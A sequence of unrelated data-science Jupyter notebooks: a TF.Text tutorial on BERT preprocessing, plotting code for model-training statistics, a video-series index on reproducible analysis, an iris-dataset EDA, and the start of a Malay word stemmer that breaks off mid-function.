Text preprocessing is the end-to-end transformation of raw text into a model’s integer inputs. NLP models are often accompanied by several hundreds (if not thousands) of lines of Python code for preprocessing text. Text preprocessing is often a challenge for models because:
* **Training-serving skew.** It becomes increasingly difficult to ensure that the preprocessing logic of the model's inputs are consistent at all stages of model development (e.g. pretraining, fine-tuning, evaluation, inference).
Using different hyperparameters, tokenization, string preprocessing algorithms or simply packaging model inputs inconsistently at different stages could yield hard-to-debug and disastrous effects to the model.
* **Efficiency and flexibility.** While preprocessing can be done offline (e.g. by writing out processed outputs to files on disk and then reconsuming said preprocessed data in the input pipeline), this method incurs an additional file read and write cost. Preprocessing offline is also inconvenient if there are preprocessing decisions that need to happen dynamically. Experimenting with a different option would require regenerating the dataset again.
* **Complex model interface.** Text models are much more understandable when their inputs are pure text. It's hard to understand a model when its inputs require an extra, indirect encoding step. Reducing the preprocessing complexity is especially appreciated for model debugging, serving, and evaluation.
Additionally, simpler model interfaces also make it more convenient to try the model (e.g. inference or training) on different, unexplored datasets.
## Text preprocessing with TF.Text
Using TF.Text's text preprocessing APIs, we can construct a preprocessing
function that can transform a user's text dataset into the model's
integer inputs. Users can package preprocessing directly as part of their model to alleviate the above mentioned problems.
This tutorial will show how to use TF.Text preprocessing ops to transform text data into inputs for the BERT model and inputs for language masking pretraining task described in "Masked LM and Masking Procedure" of [BERT: Pre-training of Deep Bidirectional Transformers for Language Understanding](https://arxiv.org/pdf/1810.04805.pdf). The process involves tokenizing text into subword units, combining sentences, trimming content to a fixed size and extracting labels for the masked language modeling task.
### Setup
Let's import the packages and libraries we need first.
```
!pip install -q -U "tensorflow-text==2.8.*"
import tensorflow as tf
import tensorflow_text as text
import functools
```
Our data contains two text features and we can create an example `tf.data.Dataset`. Our goal is to create a function that we can supply to `Dataset.map()` for use in training.
```
examples = {
"text_a": [
"Sponge bob Squarepants is an Avenger",
"Marvel Avengers"
],
"text_b": [
"Barack Obama is the President.",
"President is the highest office"
],
}
dataset = tf.data.Dataset.from_tensor_slices(examples)
next(iter(dataset))
```
### Tokenizing
Our first step is to run any string preprocessing and tokenize our dataset. This can be done using the [`text.BertTokenizer`](https://tensorflow.org/text/api_docs/python/text/BertTokenizer), which is a [`text.Splitter`](https://tensorflow.org/text/api_docs/python/text/Splitter) that can tokenize sentences into subwords or wordpieces for the [BERT model](https://github.com/google-research/bert) given a vocabulary generated from the [Wordpiece algorithm](https://www.tensorflow.org/text/guide/subwords_tokenizer#optional_the_algorithm). You can learn more about other subword tokenizers available in TF.Text from [here](https://www.tensorflow.org/text/guide/subwords_tokenizer).
The vocabulary can be from a previously generated BERT checkpoint, or you can generate one yourself on your own data. For the purposes of this example, let's create a toy vocabulary:
```
_VOCAB = [
# Special tokens
b"[UNK]", b"[MASK]", b"[RANDOM]", b"[CLS]", b"[SEP]",
# Suffixes
b"##ack", b"##ama", b"##ger", b"##gers", b"##onge", b"##pants", b"##uare",
b"##vel", b"##ven", b"an", b"A", b"Bar", b"Hates", b"Mar", b"Ob",
b"Patrick", b"President", b"Sp", b"Sq", b"bob", b"box", b"has", b"highest",
b"is", b"office", b"the",
]
_START_TOKEN = _VOCAB.index(b"[CLS]")
_END_TOKEN = _VOCAB.index(b"[SEP]")
_MASK_TOKEN = _VOCAB.index(b"[MASK]")
_RANDOM_TOKEN = _VOCAB.index(b"[RANDOM]")
_UNK_TOKEN = _VOCAB.index(b"[UNK]")
_MAX_SEQ_LEN = 8
_MAX_PREDICTIONS_PER_BATCH = 5
_VOCAB_SIZE = len(_VOCAB)
lookup_table = tf.lookup.StaticVocabularyTable(
tf.lookup.KeyValueTensorInitializer(
keys=_VOCAB,
key_dtype=tf.string,
values=tf.range(
tf.size(_VOCAB, out_type=tf.int64), dtype=tf.int64),
value_dtype=tf.int64
),
num_oov_buckets=1
)
```
Let's construct a [`text.BertTokenizer`](https://tensorflow.org/text/api_docs/python/text/BertTokenizer) using the above vocabulary and tokenize the text inputs into a [`RaggedTensor`](https://www.tensorflow.org/api_docs/python/tf/RaggedTensor).
```
bert_tokenizer = text.BertTokenizer(lookup_table, token_out_type=tf.string)
bert_tokenizer.tokenize(examples["text_a"])
bert_tokenizer.tokenize(examples["text_b"])
```
Text output from [`text.BertTokenizer`](https://tensorflow.org/text/api_docs/python/text/BertTokenizer) allows us to see how the text is being tokenized, but the model requires integer IDs. We can set the `token_out_type` param to `tf.int64` to obtain integer IDs (which are the indices into the vocabulary).
```
bert_tokenizer = text.BertTokenizer(lookup_table, token_out_type=tf.int64)
segment_a = bert_tokenizer.tokenize(examples["text_a"])
segment_a
segment_b = bert_tokenizer.tokenize(examples["text_b"])
segment_b
```
[`text.BertTokenizer`](https://tensorflow.org/text/api_docs/python/text/BertTokenizer) returns a `RaggedTensor` with shape `[batch, num_tokens, num_wordpieces]`. Because we don't need the extra `num_tokens` dimensions for our current use case, we can merge the last two dimensions to obtain a `RaggedTensor` with shape `[batch, num_wordpieces]`:
```
segment_a = segment_a.merge_dims(-2, -1)
segment_a
segment_b = segment_b.merge_dims(-2, -1)
segment_b
```
### Content Trimming
The main input to BERT is a concatenation of two sentences. However, BERT requires inputs of a fixed size and shape, and we may have content that exceeds our budget.
We can tackle this by using a [`text.Trimmer`](https://tensorflow.org/text/api_docs/python/text/Trimmer) to trim our content down to a predetermined size (once concatenated along the last axis). There are different `text.Trimmer` types which select content to preserve using different algorithms. [`text.RoundRobinTrimmer`](https://tensorflow.org/text/api_docs/python/text/RoundRobinTrimmer) for example will allocate quota equally for each segment but may trim the ends of sentences. [`text.WaterfallTrimmer`](https://tensorflow.org/text/api_docs/python/text/WaterfallTrimmer) will trim starting from the end of the last sentence.
For our example, we will use `RoundRobinTrimmer` which selects items from each segment in a left-to-right manner.
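A pure-Python sketch of the round-robin idea (not the library's actual implementation): take one item from each segment in turn until the shared budget is spent.

```python
def round_robin_trim(segments, max_seq_length):
    # Take one element from each segment per round until the combined
    # budget across all segments is exhausted
    kept = [[] for _ in segments]
    budget, i = max_seq_length, 0
    while budget > 0 and any(i < len(s) for s in segments):
        for k, seg in enumerate(segments):
            if budget > 0 and i < len(seg):
                kept[k].append(seg[i])
                budget -= 1
        i += 1
    return kept

print(round_robin_trim([[1, 2, 3, 4], [5, 6]], max_seq_length=5))
# [[1, 2, 3], [5, 6]] -> the budget of 5 is shared as evenly as possible
```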
```
trimmer = text.RoundRobinTrimmer(max_seq_length=_MAX_SEQ_LEN)
trimmed = trimmer.trim([segment_a, segment_b])
trimmed
```
`trimmed` now contains the segments where the total number of elements across a batch is 8 (when concatenated along axis=-1).
### Combining segments
Now that we have segments trimmed, we can combine them together to get a single `RaggedTensor`. BERT uses special tokens to indicate the beginning (`[CLS]`) and end of a segment (`[SEP]`). We also need a `RaggedTensor` indicating which items in the combined `Tensor` belong to which segment. We can use [`text.combine_segments()`](https://tensorflow.org/text/api_docs/python/text/combine_segments) to get both of these `Tensor` with special tokens inserted.
```
segments_combined, segments_ids = text.combine_segments(
trimmed,
start_of_sequence_id=_START_TOKEN, end_of_segment_id=_END_TOKEN)
segments_combined, segments_ids
```
### Masked Language Model Task
Now that we have our basic inputs, we can begin to extract the inputs needed for the "Masked LM and Masking Procedure" task described in [BERT: Pre-training of Deep Bidirectional Transformers for Language Understanding](https://arxiv.org/pdf/1810.04805.pdf)
The masked language model task has two sub-problems for us to think about: (1) what items to select for masking and (2) what values are they assigned?
#### Item Selection
Because we will choose to select items randomly for masking, we will use a [`text.RandomItemSelector`](https://tensorflow.org/text/api_docs/python/text/RandomItemSelector). `RandomItemSelector` randomly selects items in a batch subject to restrictions given (`max_selections_per_batch`, `selection_rate` and `unselectable_ids`) and returns a boolean mask indicating which items were selected.
```
random_selector = text.RandomItemSelector(
max_selections_per_batch=_MAX_PREDICTIONS_PER_BATCH,
selection_rate=0.2,
unselectable_ids=[_START_TOKEN, _END_TOKEN, _UNK_TOKEN]
)
selected = random_selector.get_selection_mask(
segments_combined, axis=1)
selected
```
#### Choosing the Masked Value
The methodology described in the original BERT paper for choosing the value for masking is as follows:
For `mask_token_rate` of the time, replace the item with the `[MASK]` token:
"my dog is hairy" -> "my dog is [MASK]"
For `random_token_rate` of the time, replace the item with a random word:
"my dog is hairy" -> "my dog is apple"
For `1 - mask_token_rate - random_token_rate` of the time, keep the item
unchanged:
"my dog is hairy" -> "my dog is hairy."
[`text.MaskValuesChooser`](https://tensorflow.org/text/api_docs/python/text/MaskValuesChooser) encapsulates this logic and can be used for our preprocessing function. Here's an example of what `MaskValuesChooser` returns given a `mask_token_rate` of 80% and default `random_token_rate`:
```
mask_values_chooser = text.MaskValuesChooser(_VOCAB_SIZE, _MASK_TOKEN, 0.8)
mask_values_chooser.get_mask_values(segments_combined)
```
When supplied with a `RaggedTensor` input, `text.MaskValuesChooser` returns a `RaggedTensor` of the same shape with either `_MASK_VALUE` (0), a random ID, or the same unchanged id.
#### Generating Inputs for Masked Language Model Task
Now that we have a `RandomItemSelector` to help us select items for masking and `text.MaskValuesChooser` to assign the values, we can use [`text.mask_language_model()`](https://tensorflow.org/text/api_docs/python/text/mask_language_model) to assemble all the inputs of this task for our BERT model.
```
masked_token_ids, masked_pos, masked_lm_ids = text.mask_language_model(
segments_combined,
item_selector=random_selector, mask_values_chooser=mask_values_chooser)
```
Let's dive deeper and examine the outputs of `mask_language_model()`. The output of `masked_token_ids` is:
```
masked_token_ids
```
Remember that our input is encoded using a vocabulary. If we decode `masked_token_ids` using our vocabulary, we get:
```
tf.gather(_VOCAB, masked_token_ids)
```
Notice that some wordpiece tokens have been replaced with either `[MASK]`, `[RANDOM]` or a different ID value. `masked_pos` output gives us the indices (in the respective batch) of the tokens that have been replaced.
```
masked_pos
```
`masked_lm_ids` gives us the original value of the token.
```
masked_lm_ids
```
We can again decode the IDs here to get human readable values.
```
tf.gather(_VOCAB, masked_lm_ids)
```
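The three outputs fit together: for each row, `masked_pos` points at the positions that were altered, `masked_lm_ids` records the original IDs at those positions (the prediction targets), and `masked_token_ids` carries the altered sequence. Here is a toy pure-Python illustration of that relationship, using hypothetical IDs rather than the notebook's vocabulary:

```python
# Toy ids illustrating how mask_language_model()'s outputs relate.
original_ids  = [2, 15, 10, 16, 21, 3]                 # combined segment before masking
masked_pos    = [1, 3]                                 # positions selected for prediction
mask_token    = 4
masked_lm_ids = [original_ids[p] for p in masked_pos]  # labels the model must predict

masked_token_ids = list(original_ids)
for p in masked_pos:
    masked_token_ids[p] = mask_token                   # always [MASK] here, for simplicity
```

Writing `masked_lm_ids` back into `masked_token_ids` at `masked_pos` reproduces the original sequence, which is exactly what the model is trained to do at the masked positions.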
### Padding Model Inputs
Now that we have all the inputs for our model, the last step in our preprocessing is to package them into fixed 2-dimensional `Tensor`s with padding and also generate a mask `Tensor` indicating the values which are pad values. We can use [`text.pad_model_inputs()`](https://tensorflow.org/text/api_docs/python/text/pad_model_inputs) to help us with this task.
```
# Prepare and pad combined segment inputs
input_word_ids, input_mask = text.pad_model_inputs(
masked_token_ids, max_seq_length=_MAX_SEQ_LEN)
input_type_ids, _ = text.pad_model_inputs(
segments_ids, max_seq_length=_MAX_SEQ_LEN)
# Prepare and pad masking task inputs
masked_lm_positions, masked_lm_weights = text.pad_model_inputs(
masked_pos, max_seq_length=_MAX_PREDICTIONS_PER_BATCH)
masked_lm_ids, _ = text.pad_model_inputs(
masked_lm_ids, max_seq_length=_MAX_PREDICTIONS_PER_BATCH)
model_inputs = {
"input_word_ids": input_word_ids,
"input_mask": input_mask,
"input_type_ids": input_type_ids,
"masked_lm_ids": masked_lm_ids,
"masked_lm_positions": masked_lm_positions,
"masked_lm_weights": masked_lm_weights,
}
model_inputs
```
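Under the hood, `pad_model_inputs` is doing something like the following pure-Python sketch (an illustration, not the actual TF implementation): each ragged row is truncated or padded to the fixed length, and the mask marks which positions hold real values.

```python
def pad_model_inputs_sketch(ragged_rows, max_seq_length, pad_value=0):
    # Truncate or pad each row to max_seq_length and emit a 0/1 mask
    # marking the positions that held real (non-pad) values.
    padded, mask = [], []
    for row in ragged_rows:
        row = row[:max_seq_length]
        pad = max_seq_length - len(row)
        padded.append(row + [pad_value] * pad)
        mask.append([1] * len(row) + [0] * pad)
    return padded, mask

ids, mask = pad_model_inputs_sketch([[2, 15, 10], [2, 21, 16, 14, 3]], 4)
# ids  -> [[2, 15, 10, 0], [2, 21, 16, 14]]
# mask -> [[1, 1, 1, 0], [1, 1, 1, 1]]
```

The mask produced this way is what lets the model ignore pad positions, e.g. as `input_mask` and `masked_lm_weights` above.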
## Review
Let's review what we have so far and assemble our preprocessing function. Here's what we have:
```
def bert_pretrain_preprocess(vocab_table, features):
# Input is a string Tensor of documents, shape [batch, 1].
text_a = features["text_a"]
text_b = features["text_b"]
# Tokenize segments to shape [num_sentences, (num_words)] each.
tokenizer = text.BertTokenizer(
vocab_table,
token_out_type=tf.int64)
segments = [tokenizer.tokenize(text).merge_dims(
1, -1) for text in (text_a, text_b)]
# Truncate inputs to a maximum length.
trimmer = text.RoundRobinTrimmer(max_seq_length=6)
trimmed_segments = trimmer.trim(segments)
# Combine segments, get segment ids and add special tokens.
segments_combined, segment_ids = text.combine_segments(
trimmed_segments,
start_of_sequence_id=_START_TOKEN,
end_of_segment_id=_END_TOKEN)
# Apply dynamic masking task.
masked_input_ids, masked_lm_positions, masked_lm_ids = (
text.mask_language_model(
segments_combined,
random_selector,
mask_values_chooser,
)
)
# Prepare and pad combined segment inputs
input_word_ids, input_mask = text.pad_model_inputs(
masked_input_ids, max_seq_length=_MAX_SEQ_LEN)
input_type_ids, _ = text.pad_model_inputs(
segment_ids, max_seq_length=_MAX_SEQ_LEN)
# Prepare and pad masking task inputs
masked_lm_positions, masked_lm_weights = text.pad_model_inputs(
masked_lm_positions, max_seq_length=_MAX_PREDICTIONS_PER_BATCH)
masked_lm_ids, _ = text.pad_model_inputs(
masked_lm_ids, max_seq_length=_MAX_PREDICTIONS_PER_BATCH)
model_inputs = {
"input_word_ids": input_word_ids,
"input_mask": input_mask,
"input_type_ids": input_type_ids,
"masked_lm_ids": masked_lm_ids,
"masked_lm_positions": masked_lm_positions,
"masked_lm_weights": masked_lm_weights,
}
return model_inputs
```
We previously constructed a `tf.data.Dataset` and we can now use our assembled preprocessing function `bert_pretrain_preprocess()` in `Dataset.map()`. This allows us to create an input pipeline for transforming our raw string data into integer inputs and feed directly into our model.
```
dataset = (
tf.data.Dataset.from_tensors(examples)
.map(functools.partial(bert_pretrain_preprocess, lookup_table))
)
next(iter(dataset))
```
## Related Tutorials
* [Classify text with BERT](https://www.tensorflow.org/text/tutorials/classify_text_with_bert) - A tutorial on how to use a pretrained BERT model to classify text. This is a nice follow up now that you are familiar with how to preprocess the inputs used by the BERT model.
* [Tokenizing with TF Text](https://www.tensorflow.org/text/guide/tokenizers) - Tutorial detailing the different types of tokenizers that exist in TF.Text.
* [Handling Text with `RaggedTensor`](https://www.tensorflow.org/guide/ragged_tensor) - Detailed guide on how to create, use and manipulate `RaggedTensor`s.
| github_jupyter |
```
from images.scripts_helper import RobotStats
import pickle  # Python 3: cPickle was merged into the pickle module
import matplotlib.pyplot as plt
import matplotlib.pylab as pylab
import matplotlib
import numpy as np
import inspect
from numbers import Number
%matplotlib inline
with open('/Users/beijbom/Dropbox/dummyfigs/rs3.pkld', 'rb') as f:  # binary mode for pickle
    db = pickle.load(f)
def best_per_source(db, metric):
    # Keep, per source, the row that maximizes `metric` among valid rows.
    source_ids = np.unique([x.source_id for x in db])
    dbnew = []
    for source_id in source_ids:
        db_sub = [row for row in db if row.source_id == source_id]
        db_valid = [row for row in db_sub
                    if isinstance(getattr(row, metric), (int, np.float32, np.float64))]
        if len(db_valid) > 0:
            dbnew.append(db_valid[np.argmax([getattr(row, metric) for row in db_valid])])
    return dbnew
def remove_small(db, th):
    # Drop rows whose original sample count is at or below the threshold.
    return [row for row in db if row.nsamples_org > th]
def valid_alleviation(db):
    # Keep rows whose "allevation_level" attribute (sic) holds a number.
    return [row for row in db if isinstance(row.allevation_level, (int, np.float32, np.float64))]
(dir(db[0]), len(db))
```
### Look at the various options of nbr samples used in training
```
def train_size_plotter(metric):
    yss = [1, 1]
    for (itt, field) in enumerate(['target_nbr_samples_final', 'target_nbr_samples_hp']):
        ys = []
        target_vals = np.unique([getattr(x, field) for x in db])
        for val in target_vals:
            db_sub = [row for row in db if getattr(row, field) == val]
            db_valid = [row for row in db_sub
                        if isinstance(getattr(row, metric), (int, np.float32, np.float64))]
            ys.append([getattr(x, metric) for x in db_valid])
        plt.subplot(1, 2, itt + 1)
        plt.hist(ys, bins=np.linspace(0, 100, 10), rwidth=3, histtype='barstacked', alpha=.85)
        plt.title(metric + " " + field)
        plt.legend(target_vals)
        yss[itt] = ys
    return yss
pylab.rcParams['figure.figsize'] = (12.0, 5.0)
train_size_plotter("allevation_level")
plt.show()
```
### Line & surface plot for accuracy
```
metric = "allevation_level"
target_vals = [2500, 4000, 7500]
bins = np.linspace(-5, 105, 8)
pylab.rcParams['figure.figsize'] = (12.0, 5.0)
colors = ['red', 'green', 'blue']
font = {'size' : 14, 'weight' : 'normal'}
matplotlib.rc('font', **font)
for (itt, val) in enumerate(target_vals):
db_sub =[(row) for row in db if getattr(row, "target_nbr_samples_final") == val]
db_valid =[(row) for row in db_sub if isinstance(getattr(row, metric),(int, np.float32, np.float64))]
ys = [getattr(x, metric) for x in db_valid]
vals, a = np.histogram(ys, bins = bins)
vals = np.float32(vals) / sum(vals)
bincenters = 0.5*(bins[1:]+bins[:-1])
plt.plot(bincenters, vals, color = colors[itt], marker = '.', markersize = 10, linewidth = 2)
plt.fill_between(bincenters, vals, color = colors[itt], alpha = .3)
plt.legend(target_vals)
plt.grid(b = 'on', axis='y')
plt.xlabel('Level of alleviation (%)')
plt.ylabel('Pr(x)')
plt.savefig('alleviation_stats_trainsize_breakdown.png', dpi=400)
```
### Accuracy and alleviate plots for the thesis.
```
pylab.rcParams['figure.figsize'] = (12.0, 5.0)
target_vals = [2500, 4000, 7500]
def standard_barplot(db, metric, multiplier):
ys = []
for val in target_vals:
db_sub =[(row) for row in db if row.target_nbr_samples_final == val]
ys.append([multiplier * getattr(x, metric) for x in db_sub])
plt.hist(ys, bins = np.linspace(10,100,10), alpha = .75, histtype='barstacked')
plt.legend(target_vals)
plt.grid(b = 'on', axis='y')
plt.ylabel("Count")
font = {'size' : 14, 'weight' : 'normal'}
matplotlib.rc('font', **font)
plt.subplot(1, 2, 1)
standard_barplot(valid_alleviation(remove_small(db, 5000)), 'funckappa', 100)
plt.text(13, 22, 'A)', fontsize = 24)
plt.xlabel("Acc (Kappa func. group %)")
plt.subplot(1, 2, 2)
standard_barplot(valid_alleviation(remove_small(db, 5000)), 'allevation_level', 1)
plt.xlabel("Level of alleviation (%)")
plt.text(13, 15.8, 'B)', fontsize = 24)
plt.savefig('cnstats_acc_all.png', dpi=400)
```
### Correlation between accuracy and nbr samples.
```
def accuracy_scatter(db, xfield, yfield, ymult = 1):
for (i, val) in enumerate(target_vals):
db_sub =[(row) for row in db if row.target_nbr_samples_final == val]
yvals = [getattr(x, yfield) * ymult for x in db_sub]
xvals = [getattr(x, xfield) for x in db_sub]
plt.scatter(xvals, yvals, color=colors[i])
colors = ['blue', 'green', 'red']
target_vals = [2500, 4000, 7500]
pylab.rcParams['figure.figsize'] = (12.0, 5.0)
font = {'size' : 14, 'weight' : 'normal'}
matplotlib.rc('font', **font)
plt.subplot(1, 2, 1)
accuracy_scatter(db, "nsamples_org", "funckappa", ymult= 100)
plt.legend(target_vals)
plt.xscale('log')
plt.xlim([500, 900000])
plt.text(1000, 97, 'A)', fontsize = 24)
plt.ylim([0, 110])
plt.ylabel('Acc. (Kappa func. group %)')
plt.xlabel('Number of samples')
plt.grid('on')
plt.subplot(1, 2, 2)
accuracy_scatter(db, "nlabels", "train_time", ymult = 1.0/3600)
plt.legend(target_vals)
# plt.xscale('log')
# plt.yscale('log')
plt.xlim([0, 120])
plt.ylim([0, 120])
plt.text(20, 105, 'B)', fontsize = 24)
plt.ylabel('Training time (h)')
plt.xlabel('Size of label-set')
plt.grid('on')
plt.savefig('cnstats_scatter.png', dpi=400)
```
#### Correlation size of labelset and accuracy
```
pylab.rcParams['figure.figsize'] = (12.0, 5.0)
plt.subplot(1, 2, 1)
plt.scatter([x.nlabels for x in db], [x.fullkappa * 100 for x in db])
plt.ylim([0, 100])
plt.ylabel('Acc. (Kappa full %)')
plt.xlabel('Size of labelset')
plt.grid('on')
plt.subplot(1, 2, 2)
plt.scatter([x.nlabels for x in db], [x.funckappa * 100 for x in db])
plt.ylim([0, 100])
plt.ylabel('Acc. (Kappa func. group %)')
plt.xlabel('Size of labelset')
plt.grid('on')
plt.savefig('cnstats_labelset_scatter.pdf')
db_sub =[(x) for x in db if isinstance(x.allevation_level, (int, np.float32, np.float64))]
pylab.rcParams['figure.figsize'] = (12.0, 5.0)
plt.scatter([x.nlabels for x in db_sub], [x.allevation_level for x in db_sub])
plt.xlabel('n samples')
plt.grid('on')
ns = [x.nsamples_org for x in db]
np.argmax(ns)
db[2].source_id
np.argmax([None, 'N.A.', 12])
len(remove_small(db, 1000))
```
| github_jupyter |
# Reproducible Data Analysis in Jupyter
*Jake VanderPlas, March 2017*
Jupyter notebooks provide a useful environment for interactive exploration of data. A common question, though, is how you can progress from this nonlinear, interactive, trial-and-error style of analysis to a more linear and reproducible analysis based on organized, well-tested code. This series of videos shows an example of how I approach reproducible data analysis within the Jupyter notebook.
Each video is approximately 5-8 minutes; the videos are
available in a [YouTube Playlist](https://www.youtube.com/playlist?list=PLYCpMb24GpOC704uO9svUrihl-HY1tTJJ).
Alternatively, below you can find the videos with some description and lists of relevant resources.
```
# Quick utility to embed the videos below
from IPython.display import YouTubeVideo
def embed_video(index, playlist='PLYCpMb24GpOC704uO9svUrihl-HY1tTJJ'):
return YouTubeVideo('', index=index - 1, list=playlist, width=600, height=350)
```
## Part 1: Loading and Visualizing Data
*In this video, I introduce the dataset, and use the Jupyter notebook to download and visualize it.*
```
embed_video(1)
```
Relevant resources:
- [Fremont Bridge Bike Counter](http://www.seattle.gov/transportation/bikecounter_fremont.htm): the website where you can explore the data
- [A Whirlwind Tour of Python](https://github.com/jakevdp/WhirlwindTourOfPython): my book introducing the Python programming language, aimed at scientists and engineers.
- [Python Data Science Handbook](https://github.com/jakevdp/PythonDataScienceHandbook): my book introducing Python's data science tools, including an introduction to the IPython, Pandas, and Matplotlib tools used here.
## Part 2: Further Data Exploration
*In this video, I do some slightly more sophisticated visualization with the data, using matplotlib and pandas.*
```
embed_video(2)
```
Relevant Resources:
- [Pivot Tables Section](https://github.com/jakevdp/PythonDataScienceHandbook/blob/master/notebooks/03.09-Pivot-Tables.ipynb) from the Python Data Science Handbook
## Part 3: Version Control with Git & GitHub
*In this video, I set up a repository on GitHub and commit the notebook into version control.*
```
embed_video(3)
```
Relevant Resources:
- [Version Control With Git](https://swcarpentry.github.io/git-novice/): excellent novice-level tutorial from Software Carpentry
- [Github Guides](https://guides.github.com/): set of tutorials on using GitHub
- [The Whys and Hows of Licensing Scientific Code](http://www.astrobetter.com/blog/2014/03/10/the-whys-and-hows-of-licensing-scientific-code/): my 2014 blog post on AstroBetter
## Part 4: Working with Data and GitHub
*In this video, I refactor the data download script so that it only downloads the data when needed*
```
embed_video(4)
```
## Part 5: Creating a Python Package
*In this video, I move the data download utility into its own separate package*
```
embed_video(5)
```
Relevant Resources:
- [How To Package Your Python Code](https://python-packaging.readthedocs.io/): broad tutorial on Python packaging.
## Part 6: Unit Testing with PyTest
*In this video, I add unit tests for the data download utility*
```
embed_video(6)
```
Relevant resources:
- [Pytest Documentation](http://doc.pytest.org/)
- [Getting Started with Pytest](https://jacobian.org/writing/getting-started-with-pytest/): a nice tutorial by Jacob Kaplan-Moss
## Part 7: Refactoring for Speed
*In this video, I refactor the data download function to be a bit faster*
```
embed_video(7)
```
Relevant Resources:
- [Python ``strftime`` reference](http://strftime.org/)
- [Pandas Datetime Section](https://github.com/jakevdp/PythonDataScienceHandbook/blob/master/notebooks/03.11-Working-with-Time-Series.ipynb) from the Python Data Science Handbook
## Part 8: Debugging a Broken Function
*In this video, I discover that my refactoring has caused a bug. I debug it and fix it.*
```
embed_video(8)
```
## Part 8.5: Finding and Fixing a scikit-learn bug
*In this video, I discover a bug in the scikit-learn codebase, and go through the process of submitting a GitHub Pull Request fixing the bug*
```
embed_video(9)
```
## Part 9: Further Data Exploration: PCA and GMM
*In this video, I apply unsupervised learning techniques to the data to explore what we can learn from it*
```
embed_video(10)
```
Relevant Resources:
- [Principal Component Analysis In-Depth](https://github.com/jakevdp/PythonDataScienceHandbook/blob/master/notebooks/05.09-Principal-Component-Analysis.ipynb) from the Python Data Science Handbook
- [Gaussian Mixture Models In-Depth](https://github.com/jakevdp/PythonDataScienceHandbook/blob/master/notebooks/05.12-Gaussian-Mixtures.ipynb) from the Python Data Science Handbook
## Part 10: Cleaning-up the Notebook
*In this video, I clean-up the unsupervised learning analysis to make it more reproducible and presentable.*
```
embed_video(11)
```
Relevant Resources:
- [Learning Seattle's Work Habits from Bicycle Counts](https://jakevdp.github.io/blog/2015/07/23/learning-seattles-work-habits-from-bicycle-counts/): My 2015 blog post using Fremont Bridge data
| github_jupyter |
```
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
import pandas_profiling as pp
%matplotlib inline
```
# Load The Data from UCI Machine Learning Repository in CSV
The UCI Machine Learning Repository is a collection of databases, domain theories, and data generators that are used by the machine learning community for the empirical analysis of machine learning algorithms. See the [UCI Machine Learning Repository](https://archive.ics.uci.edu/ml/index.php).
## Data Set Collection from UCI
* `Step-1`: Go to this [link](https://archive.ics.uci.edu/ml/datasets.php)
* `Step-2`: Select the Data Sets
* `Step-3`: Copy the Data Url 
* `Step-4`: Copy the Attribute Information:
## Usage
```Python
import numpy as np
import pandas as pd
URL = "https://archive.ics.uci.edu/ml/machine-learning-databases/adult/adult.data"
Col_Names = ['age','workclass','fnlwgt','education','education-num','marital-status','occupation','relationship','race','sex','capital-gain','capital-loss','hours-per-week','native-country','Income']
Data = pd.read_csv(URL, header=None)
Data.columns = Col_Names
Data
```
## Contributing
If anyone is interested in contributing, pull requests are welcome. For major changes, please open an issue first to discuss what you would like to change.
Please make sure to update tests as appropriate.
## License
[MIT](https://choosealicense.com/licenses/mit/)[Copyright (c) 2020 REDDY PRASAD]
```
URL = "https://archive.ics.uci.edu/ml/machine-learning-databases/iris/iris.data"
Data = pd.read_csv(URL,header=None)
Data
Col = ['Sepal_Length','Sepal_Width','Petal_Length','Petal_Width','class']
Data.columns= Col
Data
Data.head() # first Five Rows
Data.tail() # last Five rows
Data.info() # Complete info about the data
Data.describe().T
Data.columns
Data.values
```
Exploratory Data Analysis refers to the critical process of performing initial investigations on a data set in order to surface as many insights from it as possible.
```
sns.pairplot(Data) # check the relationship b/w Each Col
sns.pairplot(Data, kind='reg')
```
1. **0** -- No Relationship
2. **1** -- Strong Correlated
3. **-1** -- Negative Correlated
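A quick synthetic illustration of those two endpoints (hypothetical columns, not the iris data): perfectly linear relationships give Pearson correlations of exactly +1 and -1.

```python
import numpy as np
import pandas as pd

x = np.arange(10, dtype=float)
demo = pd.DataFrame({
    'x': x,
    'pos': 2 * x + 1,    # perfect positive relationship -> correlation +1
    'neg': -3 * x + 5,   # perfect negative relationship -> correlation -1
})
corr = demo.corr()
# corr.loc['x', 'pos'] is 1.0 and corr.loc['x', 'neg'] is -1.0
```

Real data lands somewhere between these extremes, which is what the heatmap below visualizes for the iris columns.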
```
plt.figure(figsize=(30,15))
sns.heatmap(Data.corr())
plt.boxplot(Data.Sepal_Length)
plt.boxplot(Data.Sepal_Width)
plt.boxplot(Data.Petal_Length)
fig, axes = plt.subplots(nrows=2, ncols=2,figsize=(30,15)) # create 2x2 array of subplots
Data.boxplot(column='Petal_Length',by='class', ax=axes[0,0]) # add boxplot to 1st subplot
Data.boxplot(column='Petal_Width', by='class', ax=axes[0,1]) # add boxplot to 2nd subplot
Data.boxplot(column='Sepal_Width', by='class', ax=axes[1,0])
Data.boxplot(column='Sepal_Length', by='class', ax=axes[1,1])
# etc.
plt.show()
```
## Load The Data From Github
1. **Step-1:** Go to the GitHub repository: [Data Set](https://github.com/reddyprasade/Machine-Learning-Problems-DataSets)
2. **Step-2:** Select the data file: [Data Selection](https://github.com/reddyprasade/Machine-Learning-Problems-DataSets/blob/master/Regression/Automobile%20price%20data%20_Raw_.csv)
3. **Step-3:** Click on "Raw" to get the direct file URL

```
Automobile = pd.read_csv('https://raw.githubusercontent.com/reddyprasade/Machine-Learning-Problems-DataSets/master/Regression/Automobile%20price%20data%20_Raw_.csv')
Automobile
```
| github_jupyter |
```
import re
import numpy as np
import pandas as pd
import collections
from sklearn import metrics
from sklearn.preprocessing import LabelEncoder
from sklearn.model_selection import train_test_split
from unidecode import unidecode
from nltk.util import ngrams
from tqdm import tqdm
import time
# Malay affixes used for naive stemming: `permulaan` = prefixes, `hujung` = suffixes.
permulaan = [
'bel',
'se',
'ter',
'men',
'meng',
'mem',
'memper',
'di',
'pe',
'me',
'ke',
'ber',
'pen',
'per',
]
hujung = ['kan', 'kah', 'lah', 'tah', 'nya', 'an', 'wan', 'wati', 'ita']
def naive_stemmer(word):
assert isinstance(word, str), 'input must be a string'
hujung_result = re.findall(r'^(.*?)(%s)$' % ('|'.join(hujung)), word)
word = hujung_result[0][0] if len(hujung_result) else word
permulaan_result = re.findall(r'^(.*?)(%s)' % ('|'.join(permulaan[::-1])), word)
permulaan_result.extend(re.findall(r'^(.*?)(%s)' % ('|'.join(permulaan)), word))
mula = permulaan_result if len(permulaan_result) else ''
if len(mula):
